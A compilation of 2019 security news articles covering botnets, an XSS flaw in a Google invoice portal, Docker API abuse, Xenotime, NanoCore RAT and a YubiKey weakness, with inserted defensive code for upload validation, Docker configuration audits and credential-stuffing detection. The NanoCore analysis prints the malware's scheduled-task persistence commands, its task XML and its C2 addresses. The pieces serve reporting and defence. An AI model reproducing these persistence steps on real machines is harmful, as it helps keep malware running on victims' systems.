The experts pointed out that it was not simple to determine which vulnerabilities were being exploited by the botnet, because some of them had no CVE numbers assigned.

After they contacted MITRE, the organization assigned them identification numbers.

Below is the list of the exploits included in the Echobot variant discovered by the expert; some of the flaws triggered by the bot are decade-old vulnerabilities:

[Image: list of the exploits included in the Echobot variant]

The most interesting aspect of this new botnet is the fact that it also includes exploits for Oracle WebLogic Server and for networking software VMware SD-WAN.

“What I found the most interesting, and not so surprising, is the inclusion of cross-application vulnerabilities. For example, rather than sticking to devices with embedded OSs like routers, cameras, and DVRs, IoT botnets are now using vulnerabilities in enterprise web (Oracle WebLogic) and networking software (VMware SD-WAN) to infect targets and propagate malware.” added the expert.

“Also of note is the inclusion of 10+ year old exploits for network devices that I believe may never have been patched by the vendors. This alludes to the botnet developers deliberately targeting unpatched legacy vulnerabilities.”

Botnet operators continue to implement new methods to make their malware more aggressive and to infect the largest possible number of systems. The latest Echobot variant targets flaws in IoT devices and in enterprise systems as well.

“Botnet developers are always looking for ways to spread malware. They are not just relying on exploiting new vulnerabilities that target IoT devices, but vulnerabilities in enterprise systems as well. Some of the new exploits they’ve added are older and have remained unpatched by the vendor. It seems the updates to Echobot are targeting systems that have possibly remained in service, but whose vulnerabilities were forgotten.” concluded the expert.

“This is an interesting tactic as these systems if found have remained vulnerable for years and will probably remain vulnerable for many more. Also, there are not just new exploitation vectors to examine but attack vectors as well. New weaknesses in popular protocols and services that can be leveraged to amplify and reflect attacks will be discovered.”

Pierluigi Paganini

(SecurityAffairs – Echobot botnet, IoT)


Security Affairs newsletter Round 218 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.


Critical RCE affects older Diebold Nixdorf ATMs
Facebook is going to stop Huawei pre-installing apps on mobile devices
Millions of Exim mail servers vulnerable to cyber attacks
CIA sextortion campaign, analysis of a well-organized scam
CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system
Microsoft warns of spam campaign exploiting CVE-2017-11882 flaw
Retro video game website Emuparadise suffered a data breach
Shanghai Jiao Tong University data leak – 8.4TB in email metadata exposed
Spain extradites 94 Taiwanese to China phone and online fraud charges
Adobe Patch Tuesday updates fix code execution issues in Campaign, ColdFusion, and Flash
Customs and Border Protection (CBP) confirms hack of a subcontractor
CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign
How Ursnif Evolves to Keep Threatening Italy
MuddyWater APT group updated its multi-stage PowerShell backdoor Powerstats
Vulnerability in WordPress Live Chat Plugin allows to steal and hijack sessions
FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor
Google expert disclosed details of an unpatched flaw in SymCrypt library
Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws
Radiohead releases a trove of stolen music in response to the hack
RAMBleed, a new Side-Channel Attack that allows stealing sensitive data
Flaw in Evernote Web Clipper for Chrome extension allows stealing data
Massive DDos attack hit Telegram, company says most of junk traffic is from China
Ransomware paralyzed production for at least a week at ASCO factories
WAGO Industrial Switches affected by multiple flaws
Dissecting NanoCore Crimeware Attack Chain
French authorities released the PyLocky decryptor for versions 1 and 2
Millions of Exim mail servers are currently under attack
Mozilla addressed flaws in Thunderbird that allow code execution
Yubico is replacing for free YubiKey FIPS devices due to security weakness
Xenotime threat actor now is targeting Electric Utilities in US and APAC

(SecurityAffairs – newsletter)


XSS flaw would have allowed hackers access to Google’s network and impersonate its employees

Bug hunter Thomas Orlita discovered an XSS vulnerability in Google’s Invoice Submission Portal that would have allowed attackers access to Google’s internal network.

The Czech researcher Thomas Orlita discovered an XSS vulnerability in Google’s Invoice Submission Portal that would have allowed attackers access to part of Google’s internal network.

The Google Invoice Submission Portal is a public portal used by Google’s business partners to submit invoices.

An attacker could also exploit the flaw to steal Google employee cookies for internal apps and hijack accounts or send spear-phishing messages.

The attack was devised by the expert in February, and Google addressed the issue in mid-April after the researcher reported it to the tech giant.

Orlita explained that an attacker could have uploaded malformed files to the Google Invoice Submission Portal via the Upload Invoice field.

The expert noticed that the ‘upload’ feature, meant for actual invoices in PDF format, could be abused to upload HTML files. The attacker had to intercept the request and change the uploaded file’s filename and Content-Type properties to HTML.

Using this trick it was possible to store malicious files in Google’s invoicing system; they would have executed automatically when an employee tried to access them.

[Image: the upload request to the Google Invoice Submission Portal]

“Since this is just a front-end validation, it doesn’t stop us from changing the file type when sending the upload POST request. Once we select any PDF file, an upload request is fired. We can intercept the request using a web proxy debugger and change the filename and the contents from .pdf to .html.” reads the analysis published by the expert.

Orlita uploaded an HTML file including an XSS payload that, when triggered, would send him an email every time it was loaded.

A few days later, the expert received an email message showing that the JavaScript code in the XSS payload had been executed on the googleplex.com domain.

This domain is used by Google for hosting internal websites and apps. If you attempt to access the domain, you are redirected to a Google Corp login page for Google employees that requires authentication.

“The DOM of the page matches the XSS payload that was put instead of the PDF file. We can see that this URL is used for displaying a PDF file. But since the Content-Type of the uploaded file was changed from application/pdf to text/html, it displayed and rendered the XSS payload instead of the PDF.” continues the expert.

According to the researcher, it was possible to exploit the flaw to execute arbitrary code on behalf of Google employees and gain access to sensitive information.
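The root cause described above is that the portal validated the upload only in the front end and then served the stored file with the Content-Type the client had declared. The following is an added example of the server-side counterpart, written for this article and not Google's code: it ignores the client's filename and Content-Type, checks the bytes themselves, and builds response headers so that a stored invoice is never rendered inline on the hosting origin. The size limit, the `UploadCheck` type and the header set are assumptions for the example.

```python
"""Server-side validation for an invoice upload (added example, not Google's code).

The portal's weakness was trusting the client's filename and Content-Type:
an intercepted request could rename a .pdf upload to .html and set
text/html, and the stored file was later rendered as HTML on an internal
origin. A server must decide the type from the bytes and serve the file in
a way that is harmless even if that decision were wrong.
"""
from dataclasses import dataclass

PDF_MAGIC = b"%PDF-"           # every PDF starts with this header
MAX_BYTES = 10 * 1024 * 1024   # assumed size limit for an invoice


@dataclass
class UploadCheck:
    ok: bool
    reason: str


def validate_invoice_upload(filename: str, declared_type: str, data: bytes) -> UploadCheck:
    """Accept only files that actually are PDFs, regardless of what the client declares.

    The client-supplied filename and Content-Type are checked for consistency,
    but the decision rests on the file content.
    """
    if len(data) > MAX_BYTES:
        return UploadCheck(False, "file too large")
    if not filename.lower().endswith(".pdf"):
        return UploadCheck(False, f"unexpected extension on {filename!r}")
    if declared_type != "application/pdf":
        return UploadCheck(False, f"declared Content-Type {declared_type!r} is not application/pdf")
    if not data.startswith(PDF_MAGIC):
        return UploadCheck(False, "content is not a PDF (magic bytes missing)")
    # A valid PDF header followed by HTML markup is a polyglot that browsers
    # may still render as HTML if the type is ever sniffed; reject it too.
    head = data[:1024].lower()
    if b"<script" in head or b"<html" in head:
        return UploadCheck(False, "HTML markup found in file header (possible polyglot)")
    return UploadCheck(True, "ok")


def download_headers(stored_name: str) -> dict:
    """Headers for serving a stored invoice: fixed type, no sniffing, never inline.

    Even if a non-PDF slipped through, these headers stop the browser from
    executing it in the context of the serving origin.
    """
    safe_name = "".join(ch for ch in stored_name if ch.isalnum() or ch in "._-") or "invoice.pdf"
    return {
        "Content-Type": "application/pdf",              # server decides, not the upload
        "X-Content-Type-Options": "nosniff",            # no MIME sniffing into text/html
        "Content-Disposition": f'attachment; filename="{safe_name}"',  # download, do not render
        "Content-Security-Policy": "default-src 'none'; sandbox",       # no script even if rendered
    }
```

The two functions belong at different points of the flow: `validate_invoice_upload` runs on the upload handler, `download_headers` on whatever endpoint later serves the stored file to an employee, which is where the payload executed in the case above.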

The expert pointed out that many Google internal apps are hosted on the googleplex.com domain, making this issue a gift for attackers.

Below is the timeline for the flaw:

21.02.2019: Vulnerability reported
22.02.2019: Priority changed to P2 
22.02.2019: Added more information 
25.02.2019: Accepted and priority changed to P1 
06.03.2019: Reward issued 
26.03.2019: A fix has been implemented 
11.04.2019: Issue marked as fixed

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)


Crooks exploit exposed Docker APIs to build AESDDoS botnet

Cybercriminals are attempting to exploit an API misconfiguration in Docker containers to infiltrate them and run the Linux bot AESDDoS.

Hackers are attempting to exploit an API misconfiguration in the open-source version of the popular DevOps tool Docker Engine-Community to infiltrate containers and run the Linux bot AESDDoS (Backdoor.Linux.DOFLOO.AA).

Threat actors are actively scanning the Internet for exposed Docker APIs on port 2375 and use them to deliver malicious code that drops the AESDDoS Trojan.

“In this new attack, the threat actor first externally scans a given IP range by sending a TCP SYN packet to port 2375, the default port used for communicating with the Docker daemon.” reads the analysis published by Trend Micro. “Once an open port is identified, a connection asking for running containers is established. When a running container is spotted, the AESDDoS bot is then deployed using the docker exec command, which allows shell access to all applicable running containers within the exposed host. Hence, the malware is executed within an already running container while trying to hide its own presence.”

The AESDDoS malware has been active since at least 2014 and it was used to build large DDoS botnets; in some cases, it was also used in cryptojacking campaigns.

In recent months, threat actors focused their attention on misconfigured Docker services that could be abused for several malicious purposes.

“A batch file first executes the WinEggDrop scanner (s.exe), which tries port 2375 on various hosts with Chinese IP address ranges specified in the ip.txt file.” states the report. “The output of this command is saved into a file named ips.txt, which is then fed into the Docker.exe file.

We have also observed that the threat actor abuses a tool called the Docker Batch Test Tool that was developed to detect vulnerabilities in Docker.”

The malware also collects system information and sends it back to the C2; depending on the specific hardware configuration, the attackers can choose which kind of activity to carry out (i.e. launching DDoS attacks, mining cryptocurrency, etc.).

In the campaign observed by Trend Micro, the bot was deployed using the docker exec command to misconfigured containers.

The malware could allow the attackers to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.

The analysis published by Trend Micro includes technical details of the attacks and a list of Indicators of Compromise (IOCs).

In March, hundreds of Docker hosts were compromised in cryptojacking campaigns exploiting the CVE-2019-5736 runc vulnerability disclosed in February.

In order to secure Docker hosts, admins should allow only trusted sources to access the Docker API; below are some recommendations provided by Trend Micro.

“Docker explicitly warns against setting the Docker daemon to listen on port 2375 as this will give anyone the ability to gain root access to the host where the daemon is running, hence access to the API and address must be heavily restricted.” concludes the report.

“To prevent container-based incidents from happening, organizations can follow these guidelines:

  • Check API configuration. 
  • Implement the principle of least privilege. 
  • Follow recommended best practices. 
  • Employ automated runtime and image scanning to gain further visibility into the container’s processes (e.g., to determine if it has been tampered with or has vulnerabilities).”
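The first of those guidelines, checking the API configuration, comes down to one question: does the daemon listen on a TCP socket that is reachable without TLS client verification? The following added example (written for this article, not Trend Micro's or Docker's code) audits either a parsed daemon.json or a `dockerd` command line for exactly that. The `hosts`, `tlsverify` and `tlscacert` keys and the `-H`/`--host`/`--tlsverify` flags are real Docker options; the sample configurations and the 10.0.0.5 address are constructed.

```python
"""Audit a Docker daemon configuration for an exposed, unauthenticated API.

Added example, not Trend Micro's or Docker's code. It reports any TCP
listener in daemon.json `hosts` (or dockerd -H flags) that is reachable
without TLS client verification, which is the exposure abused to run
`docker exec` on a victim's containers.
"""
import shlex
from typing import List


def audit_daemon_config(config: dict) -> List[str]:
    """Return human-readable findings for a parsed daemon.json dict."""
    findings: List[str] = []
    tls_verify = bool(config.get("tlsverify", False))
    for host in config.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and npipe:// sockets are local-only
        addr = host[len("tcp://"):]
        bind_host, _, port = addr.rpartition(":")
        if not tls_verify:
            findings.append(f"{host}: TCP listener without tlsverify, remote callers get root-equivalent access")
        if bind_host in ("", "0.0.0.0", "[::]", "::"):
            findings.append(f"{host}: bound to all interfaces")
        if port == "2375":
            findings.append(f"{host}: port 2375 is the unencrypted default that Internet scanners probe")
    return findings


def audit_dockerd_cmdline(cmdline: str) -> List[str]:
    """Same audit for a `dockerd ...` command line, e.g. from a systemd unit."""
    args = shlex.split(cmdline)
    hosts: List[str] = []
    tls_verify = False
    i = 0
    while i < len(args):
        arg = args[i]
        if arg in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 2
            continue
        if arg.startswith(("-H=", "--host=")):
            hosts.append(arg.split("=", 1)[1])
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tls_verify = True
        i += 1
    return audit_daemon_config({"hosts": hosts, "tlsverify": tls_verify})


# Constructed sample configurations: the weak setting beside the corrected one.
WEAK_CONFIG = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
}
HARDENED_CONFIG = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],  # management interface only
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_daemon_config(cfg) or ["no findings"])
```

Even the hardened form still exposes the API to anyone holding a client certificate signed by the CA, so the certificate issuance itself has to be restricted; a host firewall rule limiting 2376 to the management network is a second layer that does not depend on the daemon configuration at all.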

Pierluigi Paganini

(SecurityAffairs – containers, hacking)

Xenotime threat actor now is targeting Electric Utilities in US and APAC

Experts at Dragos reported that the Xenotime threat actor, behind the 2017 Trisis/Triton malware attack, is targeting electric utilities in the US and APAC.

The Xenotime threat actor is considered responsible for the 2017 Trisis/Triton malware attack that hit oil and gas organizations.

In December 2017, the Triton malware (aka Trisis) was discovered by researchers at FireEye; it was specifically designed to target industrial control systems (ICS).

Security experts at CyberX who analyzed samples of the malware provided further details on the attack, revealing that Triton was likely developed by Iran and used to target an organization in Saudi Arabia.

In October 2018, FireEye experts discovered a link between the Triton malware, tracked by the company as TEMP.Veles, and the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), which is a Russian government research institute in Moscow.

Now, according to security firm Dragos, the group is targeting electric utilities in the United States and the Asia-Pacific (APAC) region.

“In February 2019, while working with clients across various utilities and regions, Dragos identified a persistent pattern of activity attempting to gather information and enumerate network resources associated with US and Asia-Pacific electric utilities.” reads a blog post published by Dragos.

“This behavior could indicate the activity group was preparing for a further cyberattack, or at minimum satisfying the prerequisites for a future ICS-focused intrusion.”

Xenotime has been active since at least 2014; its activity was discovered in 2017 after it caused a shutdown at a critical infrastructure organization in Saudi Arabia.

The group used a piece of malware known as Trisis, Triton and HatMan, and it targeted Schneider Electric’s Triconex safety instrumented systems (SIS) through a zero-day vulnerability. The attack was discovered after a SIS triggered a shutdown of some industrial systems, which experts believe hackers caused by accident.

[Image: Triton/Xenotime]

Dragos experts revealed that the attacks against entities in the United States and the APAC region were similar to the ones that targeted organizations in the oil and gas sector. The good news is that all the attacks carried out by the Xenotime group failed to breach the targeted organizations.

“The activities are consistent with Stage 1 ICS Cyber Kill Chain reconnaissance and initial access operations, including observed incidents of attempted authentication with credentials and possible credential ‘stuffing,’ or using stolen usernames and passwords to try and force entry into target accounts.” continues the report.
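Credential stuffing, as opposed to a brute force against a single account, shows up in authentication logs as one source trying many distinct accounts in a short window, mostly failing, and the defender's real question is whether any of those attempts succeeded. The following is an added example of that detection logic over constructed log lines; it is not Dragos's tooling, and the log format (`timestamp src_ip user result`), the thresholds and the IP addresses are assumptions made for the example.

```python
"""Detect credential-stuffing patterns in authentication logs (added example).

Not Dragos's code. The signature is a single source producing failed logins
across many *different* usernames within a short window. A success from the
same source inside that window is the event worth paging on, because it
means one of the replayed credential pairs still works.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

LOG_FORMAT = "%Y-%m-%dT%H:%M:%S"  # constructed format: "<ts> <src_ip> <user> <OK|FAIL>"

# Constructed sample: one source spraying nine accounts (one hit), plus an admin
# who mistyped a password twice from a different address.
SAMPLE_LOG = [
    "2019-02-11T08:00:01 203.0.113.7 jsmith FAIL",
    "2019-02-11T08:00:03 203.0.113.7 mlee FAIL",
    "2019-02-11T08:00:04 203.0.113.7 akhan FAIL",
    "2019-02-11T08:00:06 203.0.113.7 bwong FAIL",
    "2019-02-11T08:00:09 203.0.113.7 cdiaz FAIL",
    "2019-02-11T08:00:11 203.0.113.7 dpatel FAIL",
    "2019-02-11T08:00:12 203.0.113.7 efox FAIL",
    "2019-02-11T08:00:15 203.0.113.7 ghall FAIL",
    "2019-02-11T08:00:18 203.0.113.7 hkim OK",
    "2019-02-11T08:00:20 203.0.113.7 ilin FAIL",
    "2019-02-11T08:00:22 203.0.113.7 jsmith FAIL",
    "2019-02-11T08:05:00 198.51.100.2 opsadmin FAIL",
    "2019-02-11T08:05:10 198.51.100.2 opsadmin FAIL",
    "2019-02-11T08:05:20 198.51.100.2 opsadmin OK",
]


def parse_line(line: str) -> Tuple[datetime, str, str, str]:
    ts, src, user, result = line.split()
    return datetime.strptime(ts, LOG_FORMAT), src, user, result


def detect_stuffing(lines, window=timedelta(minutes=10), min_users=5, min_failures=8
                    ) -> Dict[str, Tuple[int, int, List[str]]]:
    """Return {src_ip: (distinct_failed_users, failures, users_with_a_success)}.

    A sliding window per source is evaluated at every event; the reported
    figures are those of the window with the most failures.
    """
    events = defaultdict(list)
    for line in lines:
        ts, src, user, result = parse_line(line.strip())
        events[src].append((ts, user, result))

    hits: Dict[str, Tuple[int, int, List[str]]] = {}
    for src, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            win = evs[start:end + 1]
            failures = [e for e in win if e[2] == "FAIL"]
            users = {e[1] for e in failures}
            if len(users) >= min_users and len(failures) >= min_failures:
                successes = sorted({e[1] for e in win if e[2] == "OK"})
                if src not in hits or len(failures) > hits[src][1]:
                    hits[src] = (len(users), len(failures), successes)
    return hits


if __name__ == "__main__":
    for src, (users, fails, ok) in detect_stuffing(SAMPLE_LOG).items():
        print(f"{src}: {fails} failures across {users} accounts; successes: {ok or 'none'}")
```

The distinct-user threshold is what separates this from a noisy but benign source such as a misconfigured service account; tune `min_users` and the window to the size of the user population, and treat a non-empty success list as an account-compromise alert rather than a reconnaissance one.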

Dragos warns that Xenotime poses a serious threat to electric utilities that use ICS/SCADA systems similar to the ones in the oil and gas industry.

“Electric utility environments are significantly different from oil and gas operations in several aspects, but electric operations still have safety and protection equipment that could be targeted with similar tradecraft. XENOTIME expressing consistent, direct interest in electric utility operations is a cause for deep concern given this adversary’s willingness to compromise process safety – and thus integrity – to fulfill its mission.” continues the report.

Dragos presented its research on Xenotime at SecurityWeek’s 2018 ICS Cyber Security Conference held in Atlanta.

“Dragos emphasizes that the observed behavior is an expansion, a proliferation of the threat, and not a shift – oil and gas entities must still grapple with this adversary’s activity.” concludes Dragos. “While unfortunate, the expansion should serve as a clear signal to ICS operators – not only in oil and gas or electric utility operations – that the time to plan, implement, and enforce security standards and response processes in industrial environments is now.”

Pierluigi Paganini

(SecurityAffairs – Triton malware, Xenotime)


Mozilla addressed flaws in Thunderbird that allow code execution

Mozilla released security updates for the Thunderbird email client that address vulnerabilities that could allow code execution on impacted systems. 

Mozilla released security updates for the Thunderbird email client that address vulnerabilities that could be exploited by attackers to execute arbitrary code on impacted systems. 

Mozilla released Thunderbird version 60.7.1, which addresses three High severity vulnerabilities and one Low risk issue.

The three High severity vulnerabilities addressed by Mozilla are:

  • CVE-2019-11703 – heap buffer overflow in icalparser.c;
  • CVE-2019-11704 – heap buffer overflow in icalvalue.c;
  • CVE-2019-11705 – stack buffer overflow in icalrecur.c.

The Low risk issue, tracked as CVE-2019-11706, is a type confusion in icalproperty.c. 

“Mozilla has released a security update to address vulnerabilities in Thunderbird. An attacker could exploit these vulnerabilities to take control of an affected system.” reads the advisory published by the US-CERT.

“The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisory for Thunderbird 60.7.1 and apply the necessary update.” 

The vulnerabilities affect all the Thunderbird versions prior to 60.7.1.  

Depending on the user’s privileges, an attacker could carry out several malicious activities, such as installing malicious applications and creating new admin accounts. 

Mozilla credited researcher Luis Merino of X41 D-Sec for the discovery of the above flaws. The vulnerabilities affect the implementation of the iCal functions; they could be used to cause a crash when processing specially crafted email messages.

The expert pointed out that the flaws cannot be triggered via email in Thunderbird, because scripting is disabled when reading mail. The issue could be exploitable in browser or browser-like contexts.

The good news is Mozilla is not aware of any attack exploiting the flaws in the wild.

Pierluigi Paganini

(SecurityAffairs – Thunderbird, hacking)


French authorities released the PyLocky decryptor for versions 1 and 2

Good news for the victims of the PyLocky ransomware versions 1 and 2: French authorities have released a PyLocky decryptor that decrypts the files for free.

French authorities have released a decryptor for PyLocky ransomware versions 1 and 2. The decryptor allows victims to decrypt their files for free. It was developed in collaboration between French law enforcement, the French Homeland Security Information Technology and Systems Service, and independent volunteer researchers.

“PyLocky is very active in France, both within the professional environment (SMEs, large businesses, associations, etc.) as well as at home. This tool is the result of a collaboration among the agencies of the French Ministry of Interior, including the first Brigade of Fraud Investigations in Information Technology (BEFTI) of the Regional Directorate of the Judicial Police of Paris, based on the technical elements gathered during its investigations and on the collaboration with volunteer researchers.” reads the post published by the French Ministry of Interior.

“Those elements allowed the Homeland Security Information Technology and Systems Service ST(SI)², part of the National Gendarmerie, to create that software.”

The French Ministry of Interior pointed out that the ransomware hit many people in Europe, especially SMBs, large businesses and associations.

The PyLocky decryptor allows decrypting files for version 1 (filenames with the .lockedfile or .lockymap extensions) and version 2 (.locky extension).

[Image: PyLocky Decryptor]

The PyLocky Decryptor can be downloaded from the following link:

https://www.cybermalveillance.gouv.fr/wp-content/uploads/2019/02/PyLocky_Decryptor_V1_V2.zip

The decryptor requires the Java Runtime to be installed.

“This software decrypts the encryption of files with the extension .lockedfile or .lockymap and version 2 (encrypted files with the .locky extension) of PyLocky.” continues the report. “It requires a computer running the operating system Microsoft Windows 7 or higher and the execution environment Java JRE (Java Runtime Environment) version 8.”

The malware researcher Michael Gillespie analyzed the decryptor and noticed the presence of 2 hardcoded private RSA keys that were likely obtained by the French police through access to the C2 server hosted on the Tor network.

Let me remind you that the decryptor doesn’t clean the infected systems.

Pierluigi Paganini

(SecurityAffairs – pyLocky Decryptor, malware)


Dissecting NanoCore Crimeware Attack Chain

The Cybaze-Yoroi ZLab analyzed a new sample of the Nanocore Remote Administration Tool (RAT) that uses a Delphi wrapper to protect its code.

Introduction

Historically, cyber-criminals adopted one or more layers of encryption and obfuscation to lower their footprint and avoid detection. The usage of cryptors and packers has become a commodity in the contemporary malware landscape, providing the so-called “FUD” (Fully UnDetectable) capabilities to malicious code and allowing the outsourcing of the payload hiding.

The CSDC monitoring operations spotted a particular sample of the famous Nanocore Remote Administrator Tools (RAT). In this specific case, a Delphi wrapper was used to protect the RAT. Thus, Cybaze-Yoroi ZLab decided to analyze this threat.

Technical Analysis

Nanocore RAT is a “general purpose” malware with specific client factories available to everyone and easily accessible. During our cyber-defense activities we discovered attack attempts against Italian companies operating in the luxury sector. For instance, we intercepted a malicious email claiming to come from a well-known Italian bank, and we started to analyze it.

Figure 1: Part of initial e-mail

The attachment looks like a 7z archive file containing a valid PE file with an Adobe Acrobat icon, a trivial trick used to lure naive users into believing that it is a legitimate PDF file. However, it contains a PE executable:

Hash: 8274313b5b1e941a67b54e9f311094f2f56a3afe97820ad03560d9885a60b71b
Threat: Nanocore RAT wrapper
Brief Description: Delphi Language Wrapper for Nanocore RAT
Ssdeep: 24576:FZ8elMYdWD7yWQ5/It6OxPtNHApfqGwcblA8:FyYEvt6OxPTHAgJcblA8
Icon: Adobe Acrobat

Table 1: Static info about Nanocore dropper/NanoCore RAT

Then we extracted some static information on the sample:

Figure 2: Information about “trasferimento.exe” dropper/NanoCore RAT

The sample was compiled with the “BobSoft Mini Delphi” compiler, and two characteristics are significant: the first is the high level of entropy, which leads us to think that the sample is somehow packed; the second is the obviously fake compilation timestamp of the executable.

When executing the malware, we noticed some checks performed by the malware in order to evade analysis sandboxes.

Figure 3: Processes checked by malware

The above figure shows some of the processes checked by the malware. This check is performed through the classic Win32 API calls “CreateToolhelp32Snapshot” and “Process32Next”.

Figure 4: API calls to check open tools

If none of the checked processes is active, the malware proceeds with the real infection: it writes the actual Nanocore RAT payload to the “%TEMP%” folder.

Figure 5: NanoCore payload written by the loader and relative API calls

Interestingly, the payload, which is later loaded into memory, is merely embedded inside a resource without any encryption or obfuscation.

Figure 6: Comparison between payload embedded in resource of “trasferimento.exe” sample and “non.exe” written in %TEMP% folder

As shown in the above figure, the “trasferimento.exe” Delphi wrapper has many embedded resources (visible on the left), and one of them contains the entire Nanocore RAT payload. On the right, there is a diff analysis of the resource named “2035” and the actual payload dropped on the victim machine. The resource “2035” has a sort of header (highlighted in yellow, in the upper left corner) which contains the name of the payload to implant on the machine, “non.exe”. The rest of the content is identical, without any protection. The “trasferimento.exe” component registers a scheduled task in order to guarantee its persistence.

Figure 7: Task-scheduler set by malware

At this point the malware creates an XML file with a pseudo-random name containing the configuration for its persistence on the machine. After creating this file, the malware spawns the “non.exe” process and then re-spawns itself through the following command lines:

"schtasks.exe" /create /f /tn "IMAP Subsystem" /xml "C:\Users\admin\AppData\Local\Temp\tmpC5A7.tmp"
"schtasks.exe" /create /f /tn "IMAP Subsystem" /xml "C:\Users\admin\AppData\Local\Temp\tmpCB59.tmp"

The body of the XML configuration file is the following:

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo />
  <Triggers />
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>false</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>4</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Users\admin\Desktop\trasferimento.exe"</Command>
      <Arguments>$(Arg0)</Arguments>
    </Exec>
  </Actions>
</Task>

The only difference between the two scheduled tasks is that one references the “trasferimento.exe” process and the other references the “non.exe” process. It seems to be a sort of survival mechanism in which both processes run and keep the infection alive.

Figure 8: Details about set task scheduler

These two processes contact two different C2s. During the analysis one of them (185.244.31[.]50) was down, while the other (79.134.225[.]41) was still working.

Figure 9: Communication with two different C2

NanoCore Client

Hash: 52d73eee176a2ff30af7e386809b94ef1c4918f131f8de1e2b66915ab8cc3790
Threat: Nanocore RAT
Brief Description: NanoCore RAT client
Ssdeep: 6144:MLV6Bta6dtJmakIM5u8GL+1WUQ52F+/8Ej4eg:MLV6BtpmkqGLUcQsEEj4h

Table 2: Information about “non.exe” NanoCore RAT

At this point, let’s start analyzing the “non.exe” file, which is the Nanocore RAT client; this one too is compiled in .NET.

Figure 10: Other information about “non.exe” NanoCore RAT and relative compiled language

The de-compiled code is quite obfuscated and encrypted with some custom routines.

Figure 11: Version of NanoCore Client

The real nature of the payload is revealed after a few steps of debugging; we also extracted the current version, 1.2.2.0, as highlighted in the red square. Going ahead with debugging, we found a recurring routine used to decrypt the RAT’s static strings and the malware configuration too:

Figure 12: Decryption routine to extract the configuration file

Like other crimeware, this one too relies on an encrypted configuration that is decrypted only during malware execution. Interestingly, the extracted configuration does not include persistence, which is however guaranteed by the scheduled task handled by the external wrapper.

Figure 13: Configuration information of the RAT client

As we can see from the above figure, this client has some interesting features enabled, like the capability to bypass UAC, or to prevent the system from going to sleep. Moreover, the primary and backup C2 are the same address; redundancy is instead provided by the other process, “trasferimento.exe”, which runs in RAT mode.

Conclusion

Nowadays many cyber criminals do not bother to write malware from scratch, because there is already a vast array of public tools suitable for the purpose. From the attacker’s point of view, the problem with using these tools is that sooner or later they will be recognized by anti-virus engines.

Therefore, attackers adopt other technologies such as packers and obfuscators, often publicly available too, or write custom loaders to hide their espionage tools, keeping them running on victim machines for a long time, silently observing their targets and awaiting the right moment to carry out their criminal plans.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

https://blog.yoroi.company/research/dissecting-nanocore-crimeware-attack-chain/

Pierluigi Paganini

(SecurityAffairs – NanoCore, malware)


Yubico is replacing for free YubiKey FIPS devices due to security weakness

Yubico is replacing YubiKey FIPS security keys due to a serious flaw that makes cryptographic operations easier to crack under specific conditions.

Yubico is replacing YubiKey FIPS security keys due to a serious flaw that makes it easier to crack RSA keys and ECDSA signatures generated on these devices.

The security advisory published by the company states that the issue impacts YubiKey FIPS series devices running firmware versions 4.4.2 and 4.4.4. The weakness affects PIV smart card applications, Universal 2nd Factor (U2F) authentication, OATH one-time passwords, and OpenPGP. Nano FIPS, C FIPS and C Nano FIPS devices are also impacted by the weakness.

“An issue exists in the YubiKey FIPS Series devices with firmware version 4.4.2 or 4.4.4 (there is no released firmware version 4.4.3) where random values leveraged in some YubiKey FIPS applications contain reduced randomness for the first operations performed after YubiKey FIPS power-up,” reads the advisory published by Yubico.

“The issue only affects certain use cases and scenarios. YubiKey FIPS applications utilizing ECDSA are at higher risk than other use cases.”

Some YubiKey FIPS applications rely on random values that contain reduced randomness for the first operations performed after the device powers up.

“The buffer holding random values contains some predictable content left over from the FIPS power-up self-tests which could affect cryptographic operations which require random data until the predictable content is exhausted,” continues the advisory.
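To see why the advisory singles out ECDSA, here is an added example (not Yubico’s code or firmware): a textbook ECDSA over a tiny curve, a model of a nonce buffer whose first value after power-up is predictable leftover content, and the auditor-side check that catches the result. The curve, keys, message hashes and nonce values are all constructed for illustration.

```python
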